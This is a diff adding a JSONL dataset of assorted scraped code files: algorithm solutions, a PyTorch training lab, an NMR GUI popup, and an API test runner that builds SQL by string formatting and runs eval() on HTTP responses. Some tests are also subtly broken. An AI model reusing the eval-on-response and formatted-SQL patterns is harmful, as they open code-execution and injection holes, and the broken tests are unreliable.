diff --git "a/3432.jsonl" "b/3432.jsonl" new file mode 100644--- /dev/null +++ "b/3432.jsonl" @@ -0,0 +1,712 @@ +{"seq_id":"383392476","text":"from lintcode import (\n TreeNode,\n)\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: True if this Binary tree is Balanced, or false.\n \"\"\"\n def is_balanced(self, root):\n # write your code here\n is_balanced, hight = self.dfs(root)\n return is_balanced\n\n def dfs(self, root):\n #is_balanced, hight \n if not root:\n return True, 0\n\n left_balanced, left_h = self.dfs(root.left)\n right_balanced, right_h = self.dfs(root.right)\n\n is_balanced = left_balanced and right_balanced and abs(left_h - right_h) <= 1 \n\n hight = max(left_h, right_h) + 1 \n\n return is_balanced, hight\n\n","sub_path":"4Binary Tree - Divide Conquer & Traverse/93. Balanced Binary Tree.py","file_name":"93. Balanced Binary Tree.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"268764144","text":"import torch\nimport time\nimport datetime\nimport os\nimport matplotlib.pyplot as plt\n\nimport numpy as np\nimport pandas as pd\n\nimport torchvision\n\n\nSUB_DIR_PICS = \"fashion\"\nDRAW_MAIN_PICTURE = True\nDOWNLOAD_DATASETS = True\nPRINT_PIC = True\nTEACH = True\n# TEACH = False\nPRINT_ALL_PICS = True\n# PRINT_ALL_PICS = False\n\n\n# lr: [0.001, 0.01, 0.1, 1]\n# bs: [1, 32, 128, 256]\n# e: [1, 5, 20]\n\n# bad\nLEARNING_RATE = 0.1\nBATCH_SIZE = 128\nEPOCH = 20\n\n\n# LEARNING_RATE = 0.1\n# BATCH_SIZE = 128\n# EPOCH = 20\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = torch.nn.Conv2d(in_channels=1, out_channels=6, kernel_size=(5, 5), padding=2)\n self.pool1 = torch.nn.MaxPool2d(kernel_size=(2, 2), stride=2)\n self.conv2 = torch.nn.Conv2d(in_channels=6, out_channels=16, kernel_size=(5, 5))\n self.pool2 = torch.nn.MaxPool2d(kernel_size=(2, 2), stride=2)\n\n self.fc1 = torch.nn.Linear(in_features=16 * 5 * 5, out_features=120)\n self.act1 = torch.nn.ReLU()\n self.fc2 = torch.nn.Linear(in_features=120, out_features=84)\n self.act2 = torch.nn.ReLU()\n self.fc3 = torch.nn.Linear(in_features=84, out_features=10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.pool1(x)\n x = self.conv2(x)\n x = self.pool2(x)\n x = x.view(-1, self.num_flat_features(x))\n\n x = self.fc1(x)\n x = self.act1(x)\n x = self.fc2(x)\n x = self.act2(x)\n x = self.fc3(x)\n return torch.nn.functional.softmax(x, dim=1)\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\nnet = Net()\n\nloss_function = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(net.parameters(), lr=LEARNING_RATE)\n\ntrain_MNIST = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('./', train=True, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\ntest_MNIST = torch.utils.data.DataLoader(\n torchvision.datasets.MNIST('./', train=False, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\ntrain_FashionMNIST = torch.utils.data.DataLoader(\n torchvision.datasets.FashionMNIST('./', train=True, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\ntest_FashionMNIST = torch.utils.data.DataLoader(\n torchvision.datasets.FashionMNIST('./', train=False, download=DOWNLOAD_DATASETS,\n transform=torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(\n (0.1307,), (0.3081,))\n ])),\n batch_size=BATCH_SIZE, shuffle=True)\n\n\ndef train():\n net.train()\n for X_batch, y_batch in train_FashionMNIST:\n optimizer.zero_grad()\n y_pred = net(X_batch)\n loss_value = loss_function(y_pred, y_batch)\n loss_value.backward()\n optimizer.step()\n\n\ndef test():\n correct = 0\n net.eval()\n with torch.no_grad():\n for X_batch, y_patch in test_FashionMNIST:\n y_pred = net(X_batch)\n pred = y_pred.data.max(1, keepdim=True)[1]\n correct += pred.eq(y_patch.data.view_as(pred)).sum()\n return correct / len(test_FashionMNIST.dataset)\n\n\ndef testWithSafe(X_batch_el):\n net.eval()\n y_pred = 0\n with torch.no_grad():\n y_pred = net([X_batch_el])\n return y_pred[0]\n\n\nif TEACH:\n print('Start', flush=True)\n print(datetime.datetime.now(), flush=True)\n print(f'Learning rate: {LEARNING_RATE}', flush=True)\n print(f'Batch size: {BATCH_SIZE}', flush=True)\n print(f'Total epoch: {EPOCH}', flush=True)\n start_time = time.time()\n printedTime = False\n for epoch in range(EPOCH):\n train()\n epoch_res = test()\n if not printedTime:\n avg = time.time() - start_time\n spent_on_epoch = \"%0.0f\" % avg\n until_end = (avg * (EPOCH - 1))\n print(f'Avg seconds spent on each epoch: {spent_on_epoch} sec', flush=True)\n print(f'Until the end: {\"%0.0f\" % (until_end // 60)} min, {\"%0.0f\" % (until_end % 60)} sec', flush=True)\n printedTime = True\n print(f'accuracy on {epoch + 1}/{EPOCH} epoch: {epoch_res.item()}', flush=True)\n\nmatrix = [[0 for j in range(10)] for i in range(10)]\nmatrixPics = [[None for j in range(10)] for i in range(10)]\nif PRINT_PIC:\n os.chdir(os.path.dirname(__file__))\n workingDirectory = os.getcwd()\n pictureFolder = os.path.join(workingDirectory, f'results/pictures/{SUB_DIR_PICS}')\n ind = 0\n\n net.eval()\n with torch.no_grad():\n for X_batch, y_patch in test_FashionMNIST:\n y_pred = net(X_batch)\n pred = y_pred.data.max(1, keepdim=True)[1]\n for j in range(len(X_batch)):\n x_batch_el = X_batch[j]\n y_real = y_patch.data.view_as(pred)[j].item()\n y_predicted = y_pred.data.max(1, keepdim=True)[1][j].item()\n matrix[y_real][y_predicted] += 1\n\n if matrix[y_real][y_predicted] == 1:\n matrixPics[y_real][y_predicted] = X_batch[j][0]\n\n if PRINT_ALL_PICS:\n if y_real != y_predicted:\n pictureFolderByReal = os.path.join(pictureFolder, f'{y_real}')\n if not os.path.exists(pictureFolderByReal):\n os.makedirs(pictureFolderByReal)\n pic_location = os.path.join(pictureFolderByReal, f'{y_predicted}_pred_|_i{ind}.png')\n plt.imshow(x_batch_el[0], cmap='gray')\n plt.title(f'real {y_real}, predicted {y_predicted}')\n print(f'Saving {pic_location}', flush=True)\n plt.savefig(pic_location)\n ind += 1\n print('Matrix:')\n print(np.array(matrix))\n\nif DRAW_MAIN_PICTURE:\n plt.figure()\n for i in range(10):\n for j in range(10):\n plt.subplot(len(matrixPics), len(matrixPics), i * 10 + j + 1)\n if matrixPics[i][j] is not None:\n plt.imshow(matrixPics[i][j], cmap='gray')\n plt.xticks([])\n plt.yticks([])\n os.chdir(os.path.dirname(__file__))\n workingDirectory = os.getcwd()\n pictureDir = os.path.join(workingDirectory, f'results/pictures/{SUB_DIR_PICS}.png')\n print(f'Saving global picture {pictureDir}', flush=True)\n plt.savefig(pictureDir)\n","sub_path":"labs/cnn/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"289897116","text":"\n\"\"\"\n======================COPYRIGHT/LICENSE START==========================\n\nEditPeak.py: Part of the CcpNmr Analysis program\n\nCopyright (C) 2003-2010 Wayne Boucher and Tim Stevens (University of Cambridge)\n\n=======================================================================\n\nThe CCPN license can be found in ../../../../license/CCPN.license.\n\n======================COPYRIGHT/LICENSE END============================\n\nfor further information, please contact :\n\n- CCPN website (http://www.ccpn.ac.uk/)\n\n- email: ccpn@bioc.cam.ac.uk\n\n- contact the authors: wb104@bioc.cam.ac.uk, tjs23@cam.ac.uk\n=======================================================================\n\nIf you are using this software for academic purposes, we suggest\nquoting the following references:\n\n===========================REFERENCE START=============================\nR. Fogh, J. Ionides, E. Ulrich, W. Boucher, W. Vranken, J.P. Linge, M.\nHabeck, W. Rieping, T.N. Bhat, J. Westbrook, K. Henrick, G. Gilliland,\nH. Berman, J. Thornton, M. Nilges, J. Markley and E. Laue (2002). The\nCCPN project: An interim report on a data model for the NMR community\n(Progress report). Nature Struct. Biol. 9, 416-418.\n\nWim F. Vranken, Wayne Boucher, Tim J. Stevens, Rasmus\nH. Fogh, Anne Pajon, Miguel Llinas, Eldon L. Ulrich, John L. Markley, John\nIonides and Ernest D. Laue (2005). The CCPN Data Model for NMR Spectroscopy:\nDevelopment of a Software Pipeline. Proteins 59, 687 - 696.\n\n===========================REFERENCE END===============================\n\n\"\"\"\nfrom memops.general import Implementation\n\nfrom memops.gui.Button import Button\nfrom memops.gui.ButtonList import UtilityButtonList\nfrom memops.gui.Entry import Entry\nfrom memops.gui.FloatEntry import FloatEntry\nfrom memops.gui.Frame import Frame\nfrom memops.gui.Label import Label\nfrom memops.gui.PulldownList import PulldownList\nfrom memops.gui.Text import Text\n\nfrom ccpnmr.analysis.popups.BasePopup import BasePopup\nfrom ccpnmr.analysis.core.ExperimentBasic import getPrimaryDataDimRef\nfrom ccpnmr.analysis.core.PeakBasic import pickPeak, movePeak, setManualPeakIntensity\nfrom ccpnmr.analysis.core.UnitConverter import pnt2ppm, unit_converter\n\nclass EditPeakPopup(BasePopup):\n \"\"\"\n **Edit Position, Intensity & Details for a Peak**\n \n This popup window provides an means of editing peak information as an\n alternative to editing values in the main peak tables. This popup is also used\n to specify parameters for when a new peak is explicitly added to a peak list\n using a tabular display.\n\n The user can specify the position of the peak's dimensions in ppm, Hz or data\n point units. Also, the user can adjust the height and volume peak intensity\n values and a textual \"Details\" field, ,which can carry the user's comments\n about the peak.\n\n When editing an existing peak, no changes are made to the peak until the\n [Update] button is pressed. Likewise for a new peak the [Add Peak] button\n commits the changes. If the popup window is closed before the changes are \n committed then the entire editing or peak addition operation is cancelled.\n\n \"\"\"\n def __init__(self, parent, peak=None, peakList=None, *args, **kw):\n\n self.titleColor = '#000080'\n self.numDims = 0\n self.peak = peak\n \n kw['borderwidth'] = 6\n BasePopup.__init__(self, parent=parent, title='Edit Peak', **kw)\n\n self.registerNotify(self.deletedPeak, 'ccp.nmr.Nmr.Peak', 'delete')\n\n for func in ('setAnnotation','setDetails','setFigOfMerit'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.Peak', func)\n for func in ('setAnnotation','setPosition','setNumAliasing'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakDim', func)\n for func in ('__init__','delete','setValue'):\n self.registerNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakIntensity', func)\n\n self.dimensionLabels =[]\n self.dimensionEntries=[]\n self.update(self.peak, peakList)\n\n def body(self, guiParent):\n\n self.geometry(\"+150+150\")\n \n guiParent.grid_columnconfigure(0, weight=1)\n self.master_frame = guiParent\n \n units = ('ppm','point','Hz')\n \n self.unit = 'ppm'\n \n self.specLabel = Label(guiParent, fg=self.titleColor, grid=(0,0), sticky='ew')\n \n self.peakLabel = Label(guiParent, grid=(0,1), sticky='ew')\n \n self.unit_frame = frame = Frame(guiParent, grid=(1,1), gridSpan=(1,2))\n\n self.unitLabel = Label(frame, text='Current units: ', grid=(0,0))\n tipText = 'Selects which unit of measurement to display peak dimension positions with'\n self.unitSelect = PulldownList(frame, callback=self.changeUnit,\n texts=units, grid=(0,1), tipText=tipText)\n \n self.heightLabel = Label(guiParent, text='Height',\n borderwidth=2, relief='groove')\n tipText = 'Sets the peak height; the value of the spectrum point intensity (albeit often interpolated)'\n self.heightEntry = FloatEntry(guiParent, borderwidth=1, tipText=tipText)\n self.volumeLabel = Label(guiParent, text='Volume',\n borderwidth=2, relief='groove')\n tipText = 'Sets the peak volume integral; normally a summation of data point values'\n self.volumeEntry = FloatEntry(guiParent, borderwidth=1, tipText=tipText)\n self.detailLabel = Label(guiParent, text='Details',\n borderwidth=2, relief='groove')\n tipText = 'A user-configurable textual comment for the peak, which appears an tables and occasionally on spectrum displays'\n self.detailEntry = Entry(guiParent, borderwidth=1, tipText=tipText)\n\n tipTexts = ['Commits the specified values to update the peak and closes the popup',]\n texts = [ 'Update' ]\n commands = [ self.commit ]\n self.buttons = UtilityButtonList(guiParent, texts=texts, commands=commands, \n doClone=False, helpUrl=self.help_url,\n tipTexts=tipTexts)\n def open(self):\n \n self.updatePeak()\n BasePopup.open(self)\n \n\n def updatePeak(self, object=None):\n \n peak = None\n if object:\n if object.className == 'Peak':\n peak = object\n elif object.className == 'PeakDim':\n peak = object.peak\n elif object.className == 'PeakIntensity':\n peak = object.peak\n \n if (peak is None) or (peak is self.peak):\n self.update(peak=self.peak)\n \n def update(self, peak = None, peakList = None):\n\n # first destroy old labels and entries (saves grid hassles)\n\n for label in self.dimensionLabels:\n label.destroy()\n for entry in self.dimensionEntries:\n entry.destroy()\n\n # now setup required data\n\n if peak:\n title = 'Edit Peak'\n self.buttons.buttons[0].config(text='Update')\n else:\n title = 'Add Peak'\n self.buttons.buttons[0].config(text='Add Peak')\n\n self.setTitle(title)\n\n self.peak = peak\n self.peakList = peakList\n if not peakList:\n if peak:\n self.peakList = peak.peakList\n else:\n return\n\n peakList = self.peakList\n spectrum = peakList.dataSource.name\n self.numDims = peakList.dataSource.numDim\n self.posn = self.numDims * [0]\n self.dataDims = peakList.dataSource.sortedDataDims()\n\n if self.peak:\n \n serial = self.peak.serial\n dims = self.peak.sortedPeakDims()\n details = self.peak.details\n if not details:\n details = ''\n if self.peak.annotation:\n annotn = '%0.16s' % self.peak.annotation\n else:\n annotn = ''\n \n heightIntensity = self.peak.findFirstPeakIntensity(intensityType='height')\n volumeIntensity = self.peak.findFirstPeakIntensity(intensityType='volume')\n\n if heightIntensity:\n height = heightIntensity.value\n else:\n height = 0.0\n \n if volumeIntensity:\n volume = volumeIntensity.value\n else:\n volume = 0.0\n\t\n for i in range(self.numDims):\n peakDim = dims[i]\n dataDimRef = peakDim.dataDimRef\n if dataDimRef:\n self.posn[i] = peakDim.position + (peakDim.numAliasing*dataDimRef.dataDim.numPointsOrig)\n else:\n self.posn[i] = peakDim.position\n\n \n else:\n \n dict = peakList.__dict__.get('serialDict')\n if dict is None:\n serial = 1\n else:\n serial = dict.get('peaks',0) + 1\n \n height = 0.0 \n volume = 0.0\n details = ''\n annotn = ''\n\n self.specLabel.set(text='Experiment: %s Spectrum: %s PeakList: %d' % (peakList.dataSource.experiment.name,spectrum,peakList.serial))\n self.peakLabel.set(text='Peak: %d' % serial)\n \n self.dimensionLabels =self.numDims*['']\n self.dimensionEntries=self.numDims*['']\n for i in range(self.numDims):\n pos = self.posn[i]\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n pos = unit_converter[('point', self.unit)]( pos, getPrimaryDataDimRef(dataDim) )\n self.dimensionLabels[i] = Label(self.master_frame, text='F%d' % (i+1), borderwidth=2, relief='groove')\n tipText = 'The peak position in dimension %d, in the specified units' % (i+1)\n self.dimensionEntries[i] = FloatEntry(self.master_frame, borderwidth=1,\n text='%8.4f' % pos, tipText=tipText)\n\n self.heightEntry.set(text='%f' % height)\n self.volumeEntry.set(text='%f' % volume)\n self.detailEntry.set(text=details)\n\n row = 0\n self.specLabel.grid(row = row, column = 0, columnspan=2, sticky='nsew')\n \n row = row + 1\n self.peakLabel.grid(row = row, column = 0, sticky='nsew')\n self.unit_frame.grid(row = row, column = 1, columnspan=2, sticky='nsew')\n\n for i in range(self.numDims):\n row = row + 1\n self.dimensionLabels[i].grid(row = row, column = 0, sticky='nsew')\n self.dimensionEntries[i].grid(row = row, column = 1, columnspan=3, sticky='e')\n \n row = row + 1\n self.heightLabel.grid(row = row, column = 0, sticky='nsew')\n self.heightEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n\n row = row + 1\n self.volumeLabel.grid(row = row, column = 0, sticky='nsew')\n self.volumeEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n\n row = row + 1\n self.detailLabel.grid(row = row, column = 0, sticky='nsew')\n self.detailEntry.grid(row = row, column = 1, columnspan=3, sticky='e')\n \n row = row + 1\n self.buttons.grid(row = row, column = 0, columnspan = 4, sticky='nsew')\n\n def changeUnit(self, unit):\n \n posDisp = self.numDims*[None]\n for i in range(self.numDims):\n posDisp[i] = float(self.dimensionEntries[i].get() )\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n posDisp[i] = unit_converter[(self.unit,'point')](posDisp[i],getPrimaryDataDimRef(dataDim))\n \n self.unit = unit\n if self.unit != 'point':\n for i in range(self.numDims):\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n posDisp[i] = unit_converter[('point',self.unit)](posDisp[i], getPrimaryDataDimRef(dataDim) )\n \n for i in range(self.numDims):\n value = posDisp[i]\n if value is None:\n self.dimensionEntries[i].set('None') \n else:\n self.dimensionEntries[i].set('%8.4f' % posDisp[i]) \n\n def commit(self):\n \n posDisp = self.numDims * [0]\n \n for i in range(self.numDims):\n posDisp[i] = float(self.dimensionEntries[i].get() )\n if self.unit != 'point':\n dataDim = self.dataDims[i]\n if dataDim.className == 'FreqDataDim':\n self.posn[i] = unit_converter[(self.unit,'point')]( posDisp[i], getPrimaryDataDimRef(dataDim) )\n \n else:\n self.posn[i] = posDisp[i]\n \n if self.peak:\n movePeak(self.peak,self.posn)\n else:\n self.peak = pickPeak(self.peakList, self.posn)\n \n height = self.heightEntry.get()\n volume = self.volumeEntry.get()\n setManualPeakIntensity(self.peak, height, intensityType='height')\n setManualPeakIntensity(self.peak, volume, intensityType='volume')\n \n details = self.detailEntry.get() or None\n \n self.peak.setDetails( details )\n\n self.close()\n \n def deletedPeak(self, peak):\n\n if self.peak is peak:\n self.close()\n\n def destroy(self):\n\n self.unregisterNotify(self.deletedPeak, 'ccp.nmr.Nmr.Peak', 'delete')\n\n for func in ('setAnnotation','setDetails','setFigOfMerit'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.Peak', func)\n for func in ('setAnnotation','setPosition','setNumAliasing'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakDim', func)\n for func in ('__init__','delete','setValue'):\n self.unregisterNotify(self.updatePeak, 'ccp.nmr.Nmr.PeakIntensity', func)\n\n BasePopup.destroy(self)\n","sub_path":"ccpnmr2.4/python/ccpnmr/analysis/popups/EditPeak.py","file_name":"EditPeak.py","file_ext":"py","file_size_in_byte":12831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31692834","text":"#Get/Create data files\ninput_data = open(\"pitches.csv\", \"r\") #Opens the raw pitch data\noutput_data = open(\"1.txt\", \"w\") #Writes mapped data to 1.txt\n\n#Iterates through the data, mapping key pitch speed (end_speed), to the value play result (type)\nfor line in input_data:\n datalist = line.strip().split(\",\")\n px,pz,start_speed,end_speed,spin_rate,spin_dir,break_angle,break_length,break_y,ax,ay,az,sz_bot,sz_top,type_confidence,vx0,vy0,vz0,x,x0,y,y0,z0,pfx_x,pfx_z,nasty,zone,code,type,pitch_type,event_num,b_score,ab_id,b_count,s_count,outs,pitch_num,on_1b,on_2b,on_3b = datalist\n #Remove holes in data\n if(pitch_type == '' or start_speed == ''): continue\n output_data.write(pitch_type + \"\\t\" + end_speed + \"\\n\")\n\n#CLose the data files \ninput_data.close()\noutput_data.close()\nprint(\"Mapper Complete\")\n","sub_path":"curtis/1Mapper.py","file_name":"1Mapper.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2643746","text":"#!/user/bin/env python\n# coding=utf-8\n'''\n# 创 建 人: 李先生\n# 文 件 名: sql_parameter.py\n# 说 明: \n# 创建时间: 2019/5/18 14:59\n'''\nimport time, logging, sys, json, requests\nfrom datetime import datetime\nfrom lib.signtype import user_sign_api, encryptAES\nfrom common.connectMySql import SqL\nfrom lib.public import validators_result, get_extract, get_param, replace_var, extract_variables, call_interface, format_url\n\ns = requests.session()\nextract_dict = {}\nstep_json = []\nlog = logging.getLogger('log')\nsql = SqL()\n\n\n# 获取签名方式\ndef get_sign(prj_id):\n \"\"\"\n sign_type: 签名方式\n \"\"\"\n sign_type = sql.execute_sql('select bp.sign_id from base_project as bp where bp.prj_id = \"{}\";'.format(prj_id),\n num=1)\n return sign_type\n\n\n# 获取测试环境\ndef get_env(env_id):\n env = sql.execute_sql(\n 'select be.project_id, be.url, be.private_key from base_environment as be where be.env_id=\"{}\";'.format(env_id),\n dict_type=True, num=1)\n return env['project_id'], env['url'], env['private_key']\n\n\ndef test_case(case_id, env_id, case_id_list, sign_type, private_key, env_url, begin_time=0, locust=False):\n \"\"\"接口测试用例\"\"\"\n case = sql.execute_sql(\n 'select bs.case_name, bs.content from base_case as bs where bs.case_id = \"{}\";'.format(case_id), dict_type=True)\n step_list = eval(case['content'])\n case_run = {\"case_id\": case_id, \"case_name\": case['case_name']}\n case_step_list = []\n for ste in step_list:\n if not locust:\n step_info = step(ste, sign_type=sign_type, private_key=private_key, env_url=env_url, begin_time=begin_time,\n locust=locust, env_id=env_id)\n case_step_list.append(step_info)\n if not locust:\n if step_info[\"result\"] == \"fail\":\n case_run[\"result\"] = \"fail\"\n # break\n if step_info[\"result\"] == \"error\":\n case_run[\"result\"] = \"error\"\n # break\n else:\n step_info, url = step(ste, sign_type=sign_type, private_key=private_key, env_url=env_url,\n begin_time=begin_time, locust=locust, env_id=env_id)\n case_step_list.append(step_info)\n if locust:\n return case_step_list, url\n class_name = '定时任务'\n func_name = sys._getframe().f_code.co_name\n method_doc = ''\n case_run[\"step_list\"], case_run['class_name'], case_run[\n 'func_name'], case_run['method_doc'] = case_step_list, class_name, func_name, method_doc\n log.info('interface response data: {}'.format(case_run))\n return case_run\n\n\ndef step(step_content, sign_type, private_key, env_url, begin_time=0, locust=False, env_id=''):\n global step_json, extract_dict, s\n if_id = step_content[\"if_id\"]\n interface = sql.execute_sql(\n 'select bi.url, bi.method, bi.data_type, bi.is_sign, bi.is_header from base_interface as bi where bi.if_id = {};'.format(\n if_id), dict_type=True)\n var_list = extract_variables(step_content)\n # 检查是否存在变量\n if var_list and not locust:\n for var_name in var_list:\n var_value = get_param(var_name, step_content)\n if var_value is None:\n var_value = get_param(var_name, step_json)\n if var_value is None:\n var_value = extract_dict[var_name]\n step_content = json.loads(replace_var(step_content, var_name, var_value))\n else:\n extract = step_content['extract']\n if_dict = {\"url\": interface['url'], \"header\": step_content[\"header\"], \"body\": step_content[\"body\"]}\n set_headers = sql.execute_sql(\n 'select be.set_headers from base_environment as be where be.env_id=\"{}\";'.format(env_id),\n dict_type=True, num=1)\n headers = set_headers['set_headers']\n make = False\n if set_headers:\n for k, v in eval(headers)['header'].items():\n if k and v:\n if '$' not in v:\n make = True\n if make:\n if_dict['header'] = eval(headers)['header']\n if interface['data_type'] == 'sql':\n for k, v in if_dict['body'].items():\n if 'select' in v:\n if_dict['body'][k] = SqL(job=True).execute_sql(v)\n # 签名\n if interface['is_sign']:\n if sign_type == 1: # md5加密\n if_dict[\"body\"] = user_sign_api(if_dict[\"body\"], private_key)\n elif sign_type == 2: # 不签名\n pass\n elif sign_type == 3: # 用户认证\n pass\n elif sign_type == 4: # AES算法加密\n if_dict[\"body\"] = encryptAES(json.dumps(if_dict['body']).encode('utf-8'),\n private_key.encode('utf-8')).decode('utf-8')\n else:\n if 'true' in step_content['body']:\n if_dict[\"body\"] = True\n elif 'false' in step_content['body']:\n if_dict['body'] = False\n if '[' in json.dumps(if_dict[\"body\"]): # body参数是list的情况\n for k, v in if_dict['body'].items():\n if_dict[\"body\"][k] = eval(v)\n if not locust:\n if_dict[\"url\"] = env_url + interface['url']\n else:\n if_dict[\"url\"] = interface['url']\n if_dict[\"if_id\"] = if_id\n if_dict[\"url\"], if_dict[\"body\"] = format_url(if_dict[\"url\"], if_dict[\"body\"])\n if_dict[\"if_name\"] = step_content[\"if_name\"]\n if_dict[\"method\"] = interface['method']\n if_dict[\"data_type\"] = interface['data_type']\n if_dict[\"is_sign\"] = interface['is_sign']\n if_dict[\"sign_type\"] = sign_type\n if locust:\n if_dict['extract'] = extract\n return if_dict, env_url\n try:\n\n if interface['is_sign']:\n if sign_type == 4:\n res = call_interface(s, if_dict[\"method\"], if_dict[\"url\"], if_dict[\"header\"],\n {'data': if_dict[\"body\"]}, if_dict[\"data_type\"])\n else:\n res = call_interface(s, if_dict[\"method\"], if_dict[\"url\"], if_dict[\"header\"],\n if_dict[\"body\"], if_dict[\"data_type\"])\n if_dict[\"res_status_code\"] = res.status_code\n # if_dict[\"res_content\"] = res.text\n if_dict[\"res_content\"] = eval(\n res.text.replace('false', 'False').replace('null', 'None').replace('true', 'True')) # 查看报告时转码错误的问题\n if interface['is_header']: # 补充默认headers中的变量\n if headers:\n for k, v in eval(headers)['header'].items():\n if k == 'token':\n eval(headers)['header'][k] = if_dict[\"res_content\"]['data']\n now_time = datetime.now()\n sql.execute_sql('update base_environment as be set be.env_id = {}, update_time = {};'.format(env_id, now_time))\n except requests.RequestException as e:\n if_dict[\"result\"] = \"Error\"\n if_dict[\"msg\"] = str(e)\n return if_dict\n if step_content[\"extract\"]:\n extract_dict = get_extract(step_content[\"extract\"], if_dict[\"res_content\"])\n if step_content[\"validators\"]:\n if_dict[\"result\"], if_dict[\"msg\"], if_dict['checkpoint'] = validators_result(step_content[\"validators\"],\n if_dict[\"res_content\"])\n if 'fail' in if_dict['result']:\n if_dict['result'] = 'fail'\n else:\n if_dict['result'] = 'pass'\n else:\n if_dict[\"result\"] = \"pass\"\n if_dict[\"msg\"] = {}\n end_time = time.clock()\n interface_totalTime = str(end_time - begin_time) + 's'\n if_dict['interface_totalTime'] = interface_totalTime\n return if_dict\n\n\ndef get_parameters():\n \"\"\"\n locust 运行参数处理\n :return: if_dict 接口请求参数\n url 请求地址\n \"\"\"\n plan = sql.execute_sql(\n 'select bp.environment_id, bp.content,bp.plan_name,bp.plan_id from base_plan as bp where bp.is_locust = 1',\n dict_type=True)\n if plan != None:\n env_id = plan['environment_id']\n case_id_list = eval(plan['content'])\n prj_id, env_url, private_key = get_env(env_id)\n sign_type = get_sign(prj_id)\n if_dict_list = []\n for case_id in case_id_list:\n if_dict, url = test_case(case_id, env_id, case_id_list, sign_type, private_key, env_url, locust=True)\n if_dict_list.append(if_dict)\n return if_dict_list, url\n else:\n log.error('查询性能测试数据为空!')\n return False\n\n\nif __name__ == '__main__':\n get_parameters()\n","sub_path":"lib/sql_parameter.py","file_name":"sql_parameter.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"106070199","text":"import itertools\nnumbers = [1, 2, 3, 7, 7, 9, 10]\nresult = [seq for i in range(len(numbers), 0, -1) for seq in itertools.combinations(numbers, i) if sum(seq) == 10]\nprint(result)\n\n\ndef subset_sum(numbers, target, partial=[], partial_sum=0):\n if partial_sum == target:\n yield partial\n if partial_sum >= target:\n return\n for i, n in enumerate(numbers):\n remaining = numbers[i + 1:]\n yield from subset_sum(remaining, target, partial + [n], partial_sum + n)\nls_input = [124, 74]\ntotal = 500\nlist(subset_sum(ls_input, total))","sub_path":"study/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293269849","text":"import itertools\nimport math\n\nif __name__ == '__main__':\n l, r = map(int, input().split())\n margin = r - l\n loop = 2019\n if margin < 2019:\n loop = margin\n\n ans = float('inf')\n for i in range(loop):\n for j in range(i + 1, loop+1):\n if l + j <= r:\n ans = min(ans, (l + i) * (l + j) % 2019)\n print(ans)","sub_path":"procon-archive/atcoder.jp/abc133/abc133_c/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"420427525","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nimport pytest\nfrom ..utils import retry\n\n\n@pytest.fixture\ndef _conut():\n return 1\n\n\nclass RetryableError(Exception):\n pass\n\n\nclass AnotherRetryableError(Exception):\n pass\n\n\nclass UnexpectedError(Exception):\n pass\n\n\ndef test_no_retry_required():\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def succeeds(counter):\n counter += 1\n return [counter, 'success']\n\n r_counter, r_result = succeeds(counter)\n\n assert r_result == 'success'\n assert r_counter == 1\n\n\ndef test_retries_once():\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def fails_once(counter):\n counter += 1\n if counter < 2:\n raise RetryableError('failed')\n else:\n return [counter, 'success']\n\n r_counter, r_result = fails_once(counter)\n assert r_counter == 2\n assert r_result == 'succcess'\n\n\ndef test_limit_is_reached():\n global counter\n counter = 0\n\n @retry(RetryableError, tries=4, delay=0.1)\n def always_fails():\n global counter\n counter += 1\n raise 